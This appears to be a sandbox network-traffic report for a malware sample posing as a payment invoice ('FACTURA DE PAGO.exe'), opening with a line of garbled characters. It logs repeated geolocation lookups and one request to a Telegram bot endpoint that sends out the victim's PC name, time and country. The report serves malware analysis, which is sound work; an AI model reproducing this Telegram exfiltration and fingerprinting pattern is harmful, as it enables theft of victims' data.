p%P!"cW:a3xS-_LN{Y{G;+3t"hp,W'/P}AW<f.9h/CG8hJ@=Zz6~@;gdEAf78QU8Y/2= szVItB~dr;,g\|,:EU>4$u%z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	188.114.97.3	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:16:53 UTC	87	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-21 09:16:53 UTC	894	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:16:53 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 27878 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kwRg4mwPJEBy1O7k0LLW3FMGzMrbHJjN0eQxDLInWqh%2FFbepePhihQ6AKzq9vpSEPpYZ5iqNFsGLWRXtCef0fpeeHHy%2F65GvaJWdcCpkUr%2Fk9qAJw7fx1req3ksOpbQ2tVkTs5JS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6026c47efae792-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1511&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1907773&cwnd=250&unsent_bytes=0&cid=0620c3e8d58b858c&ts=165&x=0"
2024-10-21 09:16:53 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:16:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	188.114.97.3	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:16:54 UTC	63	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-21 09:16:54 UTC	898	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:16:54 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 27879 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xhpdlhg87syYV%2B5pp4xUuR5FYGb%2BunqMBUn1uBFQOjXwXIHwGIxEF7Tb05rEAJ8flwlIfi%2FwqWVEv43PKJ7wOArXhK5slt7xWIz2988UGcK8m4hqXRfpdZ8lo%2FEDdgo%2F9ptqTadY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6026cad82d2832-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1274&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2234567&cwnd=251&unsent_bytes=0&cid=d381a55e122240fe&ts=152&x=0"
2024-10-21 09:16:54 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:16:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49742	188.114.97.3	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:16:56 UTC	63	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-21 09:16:56 UTC	896	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:16:56 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 27881 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NgpXlJdjyyEbhq226PBwA%2F3DVse%2FwvfIg6q5PXjCF5Rzl6k6rJMVdsDS8Zqmz05aOD6YHIdzz4FoOq6g08X3JuYCx%2Byn0ksHc73u60pfaTNwRJ2IoBN0EQh9A1ErAI8%2BzYJnYvPX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6026d51b8b2ca5-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2077&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1392307&cwnd=250&unsent_bytes=0&cid=e738f2b9cc3d93fe&ts=155&x=0"
2024-10-21 09:16:56 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:16:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	188.114.97.3	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:16:58 UTC	63	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-21 09:16:58 UTC	896	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:16:58 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 27883 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sY1OhZ32YaG%2BGIfyKDbQJzRmOLG%2FUtO264r2a2RyqOXc4eYul1rl6nbCZKEQLmwfb2TtDfrRWZZi%2FGrhVPR0j3LRzWYK9SW0ByWaSi0bVgOmfmX%2B0W0I22I0QjdWLQ9c44srqukD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6026df5d634786-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1077&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2533683&cwnd=248&unsent_bytes=0&cid=c253b77a7b98dd0a&ts=150&x=0"
2024-10-21 09:16:58 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:16:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49746	188.114.97.3	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:16:59 UTC	63	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-21 09:16:59 UTC	900	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:16:59 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 27884 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Ht60i6el3ZciecSn%2Bb7RFiBd82PDueEr7u0j6E%2FQiRzvqoGSyQRXe5k5cA0xr7F3%2FprARGdhG5lyJ4Fj81Ogf6N74R5torZNCxgeV1JQC%2Bdz4qTGkraDowpfa4%2BY6%2FB8YmEZHhd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6026e999fd6b46-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1910&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1462626&cwnd=246&unsent_bytes=0&cid=392a533e32d1b9c6&ts=160&x=0"
2024-10-21 09:16:59 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:16:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49748	188.114.97.3	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:17:01 UTC	63	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-21 09:17:01 UTC	900	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:17:01 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 27886 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G5y3ZirXNG%2FBOB9mLL%2BBvZ%2B9MyE6Hc5Xk9gTh7KTdi1YAfKFWPfIkGb5ErR6SHPXCnKfwJ7ni9ymH1U%2Fa5DjLdN6grOESdKkUB0RCCzkjSmRc%2FiGkFzcuZxmU9j21k9%2FdgIw2hAx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6026f3b9da4758-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2112&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1373814&cwnd=250&unsent_bytes=0&cid=3a19f7a94ad91a46&ts=153&x=0"
2024-10-21 09:17:01 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:17:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49750	188.114.97.3	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:17:02 UTC	87	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-21 09:17:03 UTC	894	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:17:03 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 27888 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E3eS2JtzaaeDUafAM916C9Gu1%2F%2B5Oi47PzX7WegRsC%2FDwY55wCbZwgTY5WgPZg5hIOsZJ9JM7N9ie0Cn11d6auB4ElqUqk8Q7o0zir4aLXtaeIqsmNDWK0k1jKLWvSWMvktiEXkx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6026fdcfef2cd0-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1510&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1892810&cwnd=246&unsent_bytes=0&cid=a2331851fee0101f&ts=147&x=0"
2024-10-21 09:17:03 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:17:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49752	188.114.97.3	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:17:04 UTC	87	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-21 09:17:04 UTC	896	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:17:04 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 27889 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Scg6kmxdns8dQ87AKYKtiFpCUqmiLEvm9GDliE98mmHs6ZwAhJEcVTsoyFmJn5Yeie0Pb24PypHEH0vpN%2BlkoAL4%2F4oRYrgTLCM1qOXt8MzNPakn95hjImjazN2xltI%2BjkG%2Bh6g"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d602707ee0e4772-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1634&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1665324&cwnd=251&unsent_bytes=0&cid=9a2797feb542e3d9&ts=149&x=0"
2024-10-21 09:17:04 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:17:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49754	188.114.97.3	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:17:06 UTC	87	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-21 09:17:06 UTC	904	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:17:06 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 27891 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KY%2B92veoW%2BUlduKm7d4zog9Zji6%2FEA%2BweF0MqDx7VAF7mlo9reozZQH4Bd%2FVPvip7b14HTf97C6j3yNsB1c4OfzimM2eBkd9n8kqj9k%2Fb0BBCenhpoYPjnT%2BJ9Aq3e1u%2FQaOUSvc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d60271208942cd4-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1814&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1592083&cwnd=251&unsent_bytes=0&cid=7e16ee5e56854efc&ts=148&x=0"
2024-10-21 09:17:06 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:17:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49755	149.154.167.220	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:17:07 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2021/10/2024%20/%2019:09:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-21 09:17:07 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 21 Oct 2024 09:17:07 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-21 09:17:07 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	05:16:13
Start date:	21/10/2024
Path:	C:\Users\user\Desktop\FACTURA DE PAGO.exe
Wow64 process (32bit):	true
